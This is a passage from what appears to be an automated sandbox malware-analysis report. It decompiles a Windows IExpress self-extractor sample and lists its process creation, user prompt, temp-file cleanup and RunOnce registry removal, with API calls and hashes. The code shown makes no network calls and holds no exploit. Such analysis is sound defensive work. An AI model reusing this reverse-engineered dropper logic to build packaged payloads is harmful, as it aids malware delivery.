                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$TMP4351$.TMP
                                                                                                                                                                                                      • API String ID: 747627703-1860564779
                                                                                                                                                                                                      • Opcode ID: 0a5d3e8ed668fed37a93e6a413c509d5d38045d15940efe5132364234aa47b3f
                                                                                                                                                                                                      • Instruction ID: 62606e2afcc711f4245f0234e5f2d6df1c21b9cabedc10972a1c16d68c01a3d4
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0a5d3e8ed668fed37a93e6a413c509d5d38045d15940efe5132364234aa47b3f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: AF11D0726006A0AAC7265B7BAC8DBDB7A9DDB86364F110715B50ADA2D2CB709C0586A0
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 675 3e3fef-3e4010 676 3e410a-3e411a call 3e6ce0 675->676 677 3e4016-3e403b CreateProcessA 675->677 679 3e40c4-3e4101 call 3e6285 GetLastError FormatMessageA call 3e44b9 677->679 680 3e4041-3e406e WaitForSingleObject GetExitCodeProcess 677->680 694 3e4106 679->694 681 3e4070-3e4077 680->681 682 3e4091 call 3e411b 680->682 681->682 685 3e4079-3e407b 681->685 689 3e4096-3e40b8 CloseHandle * 2 682->689 685->682 688 3e407d-3e4089 685->688 688->682 691 3e408b 688->691 692 3e40ba-3e40c0 689->692 693 3e4108 689->693 691->682 692->693 695 3e40c2 692->695 693->676 694->693 695->694
                                                                                                                                                                                                      C-Code - Quality: 84%
                                                                                                                                                                                                      			E003E3FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v524;
                                                                                                                                                                                                      				long _v528;
                                                                                                                                                                                                      				struct _PROCESS_INFORMATION _v544;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t20;
                                                                                                                                                                                                      				void* _t22;
                                                                                                                                                                                                      				int _t25;
                                                                                                                                                                                                      				intOrPtr* _t39;
                                                                                                                                                                                                      				signed int _t44;
                                                                                                                                                                                                      				void* _t49;
                                                                                                                                                                                                      				signed int _t50;
                                                                                                                                                                                                      				intOrPtr _t53;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t45 = __edx;
                                                                                                                                                                                                      				_t20 =  *0x3e8004; // 0x59d037e4
                                                                                                                                                                                                      				_v8 = _t20 ^ _t50;
                                                                                                                                                                                                      				_t39 = __ecx;
                                                                                                                                                                                                      				_t49 = 1;
                                                                                                                                                                                                      				_t22 = 0;
                                                                                                                                                                                                      				if(__ecx == 0) {
                                                                                                                                                                                                      					L13:
                                                                                                                                                                                                      					return E003E6CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				asm("stosd");
                                                                                                                                                                                                      				asm("stosd");
                                                                                                                                                                                                      				asm("stosd");
                                                                                                                                                                                                      				asm("stosd");
                                                                                                                                                                                                      				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                                                                                                                                                                      				if(_t25 == 0) {
                                                                                                                                                                                                      					 *0x3e9124 = E003E6285();
                                                                                                                                                                                                      					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0); // executed
                                                                                                                                                                                                      					_t45 = 0x4c4;
                                                                                                                                                                                                      					E003E44B9(0, 0x4c4, _t39,  &_v524, 0x10, 0); // executed
                                                                                                                                                                                                      					L11:
                                                                                                                                                                                                      					_t49 = 0;
                                                                                                                                                                                                      					L12:
                                                                                                                                                                                                      					_t22 = _t49;
                                                                                                                                                                                                      					goto L13;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                                                                                                                                                                      				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                                                                                                                                                                      				_t44 = _v528;
                                                                                                                                                                                                      				_t53 =  *0x3e8a28; // 0x0
                                                                                                                                                                                                      				if(_t53 == 0) {
                                                                                                                                                                                                      					_t34 =  *0x3e9a2c; // 0x0
                                                                                                                                                                                                      					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                                                                                                                                                                      						_t34 = _t44 & 0xff000000;
                                                                                                                                                                                                      						if((_t44 & 0xff000000) == 0xaa000000) {
                                                                                                                                                                                                      							 *0x3e9a2c = _t44;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				E003E411B(_t34, _t44);
                                                                                                                                                                                                      				CloseHandle(_v544.hThread);
                                                                                                                                                                                                      				CloseHandle(_v544);
                                                                                                                                                                                                      				if(( *0x3e9a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                                                                                                                                                                      					goto L12;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					goto L11;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}


















                                                                                                                                                                                                      0x003e3fef
                                                                                                                                                                                                      0x003e3ffa
                                                                                                                                                                                                      0x003e4001
                                                                                                                                                                                                      0x003e4008
                                                                                                                                                                                                      0x003e400a
                                                                                                                                                                                                      0x003e400b
                                                                                                                                                                                                      0x003e4010
                                                                                                                                                                                                      0x003e410a
                                                                                                                                                                                                      0x003e411a
                                                                                                                                                                                                      0x003e411a
                                                                                                                                                                                                      0x003e401c
                                                                                                                                                                                                      0x003e401d
                                                                                                                                                                                                      0x003e401e
                                                                                                                                                                                                      0x003e401f
                                                                                                                                                                                                      0x003e4033
                                                                                                                                                                                                      0x003e403b
                                                                                                                                                                                                      0x003e40ca
                                                                                                                                                                                                      0x003e40e9
                                                                                                                                                                                                      0x003e40f8
                                                                                                                                                                                                      0x003e4101
                                                                                                                                                                                                      0x003e4106
                                                                                                                                                                                                      0x003e4106
                                                                                                                                                                                                      0x003e4108
                                                                                                                                                                                                      0x003e4108
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e4108
                                                                                                                                                                                                      0x003e4049
                                                                                                                                                                                                      0x003e405c
                                                                                                                                                                                                      0x003e4062
                                                                                                                                                                                                      0x003e4068
                                                                                                                                                                                                      0x003e406e
                                                                                                                                                                                                      0x003e4070
                                                                                                                                                                                                      0x003e4077
                                                                                                                                                                                                      0x003e407f
                                                                                                                                                                                                      0x003e4089
                                                                                                                                                                                                      0x003e408b
                                                                                                                                                                                                      0x003e408b
                                                                                                                                                                                                      0x003e4089
                                                                                                                                                                                                      0x003e4077
                                                                                                                                                                                                      0x003e4091
                                                                                                                                                                                                      0x003e409c
                                                                                                                                                                                                      0x003e40a8
                                                                                                                                                                                                      0x003e40b8
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e40c2
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e40c2

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 003E4033
                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 003E4049
                                                                                                                                                                                                      • GetExitCodeProcess.KERNELBASE ref: 003E405C
                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 003E409C
                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 003E40A8
                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 003E40DC
                                                                                                                                                                                                      • FormatMessageA.KERNELBASE(00001000,00000000,00000000), ref: 003E40E9
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3183975587-0
                                                                                                                                                                                                      • Opcode ID: 229ab41dd49c9aa64eca9ee604427a598835d5c06a0bd8fa4059960bc96821bb
                                                                                                                                                                                                      • Instruction ID: 1b71f4be34f37f812fbe0dd9ff077eeffffb21ba8822b25aa71bbc9f47370ff0
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 229ab41dd49c9aa64eca9ee604427a598835d5c06a0bd8fa4059960bc96821bb
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CA31A7316406A8ABEB329B66DC89FABB77CEB98710F100369F605D91E1C6305D85CB11
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E003E51E5(void* __eflags) {
                                                                                                                                                                                                      				int _t5;
                                                                                                                                                                                                      				void* _t6;
                                                                                                                                                                                                      				void* _t28;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t1 = E003E468F("UPROMPT", 0, 0) + 1; // 0x1
                                                                                                                                                                                                      				_t28 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                      				if(_t28 != 0) {
                                                                                                                                                                                                      					if(E003E468F("UPROMPT", _t28, _t29) != 0) {
                                                                                                                                                                                                      						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                                                                                                                                                                      						if(_t5 != 0) {
                                                                                                                                                                                                      							_t6 = E003E44B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                                                                                                                                                                      							LocalFree(_t28);
                                                                                                                                                                                                      							if(_t6 != 6) {
                                                                                                                                                                                                      								 *0x3e9124 = 0x800704c7;
                                                                                                                                                                                                      								L10:
                                                                                                                                                                                                      								return 0;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							 *0x3e9124 = 0;
                                                                                                                                                                                                      							L6:
                                                                                                                                                                                                      							return 1;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						LocalFree(_t28);
                                                                                                                                                                                                      						goto L6;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					E003E44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                      					LocalFree(_t28);
                                                                                                                                                                                                      					 *0x3e9124 = 0x80070714;
                                                                                                                                                                                                      					goto L10;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				E003E44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                      				 *0x3e9124 = E003E6285();
                                                                                                                                                                                                      				goto L10;
                                                                                                                                                                                                      			}






                                                                                                                                                                                                      0x003e51fb
                                                                                                                                                                                                      0x003e5207
                                                                                                                                                                                                      0x003e520b
                                                                                                                                                                                                      0x003e523c
                                                                                                                                                                                                      0x003e5268
                                                                                                                                                                                                      0x003e5270
                                                                                                                                                                                                      0x003e528b
                                                                                                                                                                                                      0x003e5293
                                                                                                                                                                                                      0x003e529c
                                                                                                                                                                                                      0x003e52a6
                                                                                                                                                                                                      0x003e52b0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e52b0
                                                                                                                                                                                                      0x003e529e
                                                                                                                                                                                                      0x003e5279
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e527b
                                                                                                                                                                                                      0x003e5273
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5273
                                                                                                                                                                                                      0x003e524a
                                                                                                                                                                                                      0x003e5250
                                                                                                                                                                                                      0x003e5256
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e5256
                                                                                                                                                                                                      0x003e5219
                                                                                                                                                                                                      0x003e5223
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 003E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003E46A0
                                                                                                                                                                                                        • Part of subcall function 003E468F: SizeofResource.KERNEL32(00000000,00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46A9
                                                                                                                                                                                                        • Part of subcall function 003E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003E46C3
                                                                                                                                                                                                        • Part of subcall function 003E468F: LoadResource.KERNEL32(00000000,00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46CC
                                                                                                                                                                                                        • Part of subcall function 003E468F: LockResource.KERNEL32(00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46D3
                                                                                                                                                                                                        • Part of subcall function 003E468F: memcpy_s.MSVCRT ref: 003E46E5
                                                                                                                                                                                                        • Part of subcall function 003E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46EF
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,003E2F4D,?,00000002,00000000), ref: 003E5201
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 003E5250
                                                                                                                                                                                                        • Part of subcall function 003E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 003E4518
                                                                                                                                                                                                        • Part of subcall function 003E44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 003E4554
                                                                                                                                                                                                        • Part of subcall function 003E6285: GetLastError.KERNEL32(003E5BBC), ref: 003E6285
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                      • String ID: <None>$UPROMPT
                                                                                                                                                                                                      • API String ID: 957408736-2980973527
                                                                                                                                                                                                      • Opcode ID: 19932fbb36d2e5dad51428450a51fe3eb5f990c062e5725ee94d51974379a12d
                                                                                                                                                                                                      • Instruction ID: 5dd507bbd4174838edf57d6a86e949ddbccfbb1f1f93f7312e1e950d575b7b8d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 19932fbb36d2e5dad51428450a51fe3eb5f990c062e5725ee94d51974379a12d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8311E2B52006E1ABE3376B739C89B3B719DDB88394F114B29F702DE2D0DA799C005624
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 74%
                                                                                                                                                                                                      			E003E52B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				signed int _t9;
                                                                                                                                                                                                      				signed int _t11;
                                                                                                                                                                                                      				void* _t21;
                                                                                                                                                                                                      				void* _t29;
                                                                                                                                                                                                      				CHAR** _t31;
                                                                                                                                                                                                      				void* _t32;
                                                                                                                                                                                                      				signed int _t33;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t28 = __edi;
                                                                                                                                                                                                      				_t22 = __ecx;
                                                                                                                                                                                                      				_t21 = __ebx;
                                                                                                                                                                                                      				_t9 =  *0x3e8004; // 0x59d037e4
                                                                                                                                                                                                      				_v8 = _t9 ^ _t33;
                                                                                                                                                                                                      				_push(__esi);
                                                                                                                                                                                                      				_t31 =  *0x3e91e0; // 0x2c77cb0
                                                                                                                                                                                                      				if(_t31 != 0) {
                                                                                                                                                                                                      					_push(__edi);
                                                                                                                                                                                                      					do {
                                                                                                                                                                                                      						_t29 = _t31;
                                                                                                                                                                                                      						if( *0x3e8a24 == 0 &&  *0x3e9a30 == 0) {
                                                                                                                                                                                                      							SetFileAttributesA( *_t31, 0x80); // executed
                                                                                                                                                                                                      							DeleteFileA( *_t31); // executed
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t31 = _t31[1];
                                                                                                                                                                                                      						LocalFree( *_t29);
                                                                                                                                                                                                      						LocalFree(_t29);
                                                                                                                                                                                                      					} while (_t31 != 0);
                                                                                                                                                                                                      					_pop(_t28);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t11 =  *0x3e8a20; // 0x0
                                                                                                                                                                                                      				_pop(_t32);
                                                                                                                                                                                                      				if(_t11 != 0 &&  *0x3e8a24 == 0 &&  *0x3e9a30 == 0) {
                                                                                                                                                                                                      					_push(_t22);
                                                                                                                                                                                                      					E003E1781( &_v268, 0x104, _t22, "C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                      					if(( *0x3e9a34 & 0x00000020) != 0) {
                                                                                                                                                                                                      						E003E65E8( &_v268);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					SetCurrentDirectoryA(".."); // executed
                                                                                                                                                                                                      					_t22 =  &_v268;
                                                                                                                                                                                                      					E003E2390( &_v268);
                                                                                                                                                                                                      					_t11 =  *0x3e8a20; // 0x0
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if( *0x3e9a40 != 1 && _t11 != 0) {
                                                                                                                                                                                                      					_t11 = E003E1FE1(_t22); // executed
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				 *0x3e8a20 =  *0x3e8a20 & 0x00000000;
                                                                                                                                                                                                      				return E003E6CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                                                                                                                                                                      			}












                                                                                                                                                                                                      0x003e52b6
                                                                                                                                                                                                      0x003e52b6
                                                                                                                                                                                                      0x003e52b6
                                                                                                                                                                                                      0x003e52c1
                                                                                                                                                                                                      0x003e52c8
                                                                                                                                                                                                      0x003e52cb
                                                                                                                                                                                                      0x003e52cc
                                                                                                                                                                                                      0x003e52d4
                                                                                                                                                                                                      0x003e52d6
                                                                                                                                                                                                      0x003e52d7
                                                                                                                                                                                                      0x003e52de
                                                                                                                                                                                                      0x003e52e0
                                                                                                                                                                                                      0x003e52f2
                                                                                                                                                                                                      0x003e52fa
                                                                                                                                                                                                      0x003e52fa
                                                                                                                                                                                                      0x003e5302
                                                                                                                                                                                                      0x003e5305
                                                                                                                                                                                                      0x003e530c
                                                                                                                                                                                                      0x003e5312
                                                                                                                                                                                                      0x003e5316
                                                                                                                                                                                                      0x003e5316
                                                                                                                                                                                                      0x003e5317
                                                                                                                                                                                                      0x003e531c
                                                                                                                                                                                                      0x003e531f
                                                                                                                                                                                                      0x003e5333
                                                                                                                                                                                                      0x003e5345
                                                                                                                                                                                                      0x003e5351
                                                                                                                                                                                                      0x003e5359
                                                                                                                                                                                                      0x003e5359
                                                                                                                                                                                                      0x003e5363
                                                                                                                                                                                                      0x003e5369
                                                                                                                                                                                                      0x003e536f
                                                                                                                                                                                                      0x003e5374
                                                                                                                                                                                                      0x003e5374
                                                                                                                                                                                                      0x003e5381
                                                                                                                                                                                                      0x003e5387
                                                                                                                                                                                                      0x003e5387
                                                                                                                                                                                                      0x003e538f
                                                                                                                                                                                                      0x003e53a0

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SetFileAttributesA.KERNELBASE(02C77CB0,00000080,?,00000000), ref: 003E52F2
                                                                                                                                                                                                      • DeleteFileA.KERNELBASE(02C77CB0), ref: 003E52FA
                                                                                                                                                                                                      • LocalFree.KERNEL32(02C77CB0,?,00000000), ref: 003E5305
                                                                                                                                                                                                      • LocalFree.KERNEL32(02C77CB0), ref: 003E530C
                                                                                                                                                                                                      • SetCurrentDirectoryA.KERNELBASE(003E11FC,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 003E5363
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 003E5334
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                      • API String ID: 2833751637-2356899610
                                                                                                                                                                                                      • Opcode ID: 621372e670e64a7589d853b7f44e338f14f366ac311565feded837a77af1eb62
                                                                                                                                                                                                      • Instruction ID: c0bed0c306ace6c787ec50843fe035ba868e23440dbd28a443d55c310b252d56
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 621372e670e64a7589d853b7f44e338f14f366ac311565feded837a77af1eb62
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0621A435900AE4DFDB339B12DD8976977B8AB14754F05036AE8455E2E0CFB06C84CB40
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E003E1FE1(void* __ecx) {
                                                                                                                                                                                                      				void* _v8;
                                                                                                                                                                                                      				long _t4;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				if( *0x3e8530 != 0) {
                                                                                                                                                                                                      					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                                                                                                                                                                      					if(_t4 == 0) {
                                                                                                                                                                                                      						RegDeleteValueA(_v8, "wextract_cleanup1"); // executed
                                                                                                                                                                                                      						return RegCloseKey(_v8);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t4;
                                                                                                                                                                                                      			}





                                                                                                                                                                                                      0x003e1fee
                                                                                                                                                                                                      0x003e2005
                                                                                                                                                                                                      0x003e200d
                                                                                                                                                                                                      0x003e2017
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e2020
                                                                                                                                                                                                      0x003e200d
                                                                                                                                                                                                      0x003e2029

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,003E538C,?,?,003E538C), ref: 003E2005
                                                                                                                                                                                                      • RegDeleteValueA.KERNELBASE(003E538C,wextract_cleanup1,?,?,003E538C), ref: 003E2017
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(003E538C,?,?,003E538C), ref: 003E2020
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup1
                                                                                                                                                                                                      • API String ID: 849931509-1592051331
                                                                                                                                                                                                      • Opcode ID: 8c5f14f1b9ac378e60f75f83250c60f6c6d9aff91fb667dba50df1f5c038cb2e
                                                                                                                                                                                                      • Instruction ID: 212bf7affdfebc90b66c68730e21be0c026df6e4cf5fca06f8ca63dd5c9265d0
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8c5f14f1b9ac378e60f75f83250c60f6c6d9aff91fb667dba50df1f5c038cb2e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A8E04F319503A8BBD7339B92EC8AF5A7B2DF701740F100394F908A40E1EB617E14E605
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                                                                                      			E003E4CD0(char* __edx, long _a4, int _a8) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t29;
                                                                                                                                                                                                      				int _t30;
                                                                                                                                                                                                      				long _t32;
                                                                                                                                                                                                      				signed int _t33;
                                                                                                                                                                                                      				long _t35;
                                                                                                                                                                                                      				long _t36;
                                                                                                                                                                                                      				struct HWND__* _t37;
                                                                                                                                                                                                      				long _t38;
                                                                                                                                                                                                      				long _t39;
                                                                                                                                                                                                      				long _t41;
                                                                                                                                                                                                      				long _t44;
                                                                                                                                                                                                      				long _t45;
                                                                                                                                                                                                      				long _t46;
                                                                                                                                                                                                      				signed int _t50;
                                                                                                                                                                                                      				long _t51;
                                                                                                                                                                                                      				char* _t58;
                                                                                                                                                                                                      				long _t59;
                                                                                                                                                                                                      				char* _t63;
                                                                                                                                                                                                      				long _t64;
                                                                                                                                                                                                      				CHAR* _t71;
                                                                                                                                                                                                      				CHAR* _t74;
                                                                                                                                                                                                      				int _t75;
                                                                                                                                                                                                      				signed int _t76;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t69 = __edx;
                                                                                                                                                                                                      				_t29 =  *0x3e8004; // 0x59d037e4
                                                                                                                                                                                                      				_t30 = _t29 ^ _t76;
                                                                                                                                                                                                      				_v8 = _t30;
                                                                                                                                                                                                      				_t75 = _a8;
                                                                                                                                                                                                      				if( *0x3e91d8 == 0) {
                                                                                                                                                                                                      					_t32 = _a4;
                                                                                                                                                                                                      					__eflags = _t32;
                                                                                                                                                                                                      					if(_t32 == 0) {
                                                                                                                                                                                                      						_t33 = E003E4E99(_t75);
                                                                                                                                                                                                      						L35:
                                                                                                                                                                                                      						return E003E6CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t35 = _t32 - 1;
                                                                                                                                                                                                      					__eflags = _t35;
                                                                                                                                                                                                      					if(_t35 == 0) {
                                                                                                                                                                                                      						L9:
                                                                                                                                                                                                      						_t33 = 0;
                                                                                                                                                                                                      						goto L35;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t36 = _t35 - 1;
                                                                                                                                                                                                      					__eflags = _t36;
                                                                                                                                                                                                      					if(_t36 == 0) {
                                                                                                                                                                                                      						_t37 =  *0x3e8584; // 0x0
                                                                                                                                                                                                      						__eflags = _t37;
                                                                                                                                                                                                      						if(_t37 != 0) {
                                                                                                                                                                                                      							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t54 = 0x3e91e4;
